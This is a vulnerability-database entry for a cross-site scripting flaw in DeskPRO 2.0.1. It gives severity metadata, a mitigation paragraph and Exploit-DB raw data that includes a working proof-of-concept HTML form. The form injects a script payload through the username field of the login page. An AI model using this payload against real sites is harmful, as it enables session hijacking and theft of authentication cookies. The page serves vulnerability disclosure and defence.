header-logo
Suggest Exploit
vendor:
DeskPRO
by:
John Martinelli
7.5
CVSS
HIGH
HTML-injection scripting vulnerability
79
CWE
Product Name: DeskPRO
Affected Version From: DeskPRO 2.0.1
Affected Version To: DeskPRO 2.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

DeskPRO HTML-injection Scripting Vulnerability

The DeskPRO application fails to properly sanitize user-supplied input, allowing attacker-supplied HTML and script code to execute in the context of the affected site. This could potentially lead to the theft of cookie-based authentication credentials or control over how the site is rendered to the user. Other attacks are also possible.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user-supplied input before using it in HTML output. This can be achieved by implementing input validation and output encoding techniques.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23381/info

DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

DeskPRO 2.0.1 is vulnerable to this issue. 

<html>
<head><title>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</title><body>

<center><br><br><font size=4>DeskPRO v2.0.1 - Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John
Martinelli</a></font><br>

<br><br>
<form action="http://target.com/login.php" method="post">
<input type=hidden name="login_form" value="login">
<input type=hidden name="_getvars" value="getvars">
<input type=hidden name="_postvars" value="postvars">
<input type=hidden name="_filevars" value="filevars">
<input type=hidden name="password" value="password">
<input type=hidden name="remember" value=0>
<input name="username" size=75 value="<"<<script>alert(1);</script>">
<input type=submit value="Execute XSS Attack" class="button">
</form>

</body></html>

Navigation

Suggest Exploit

Services By CQR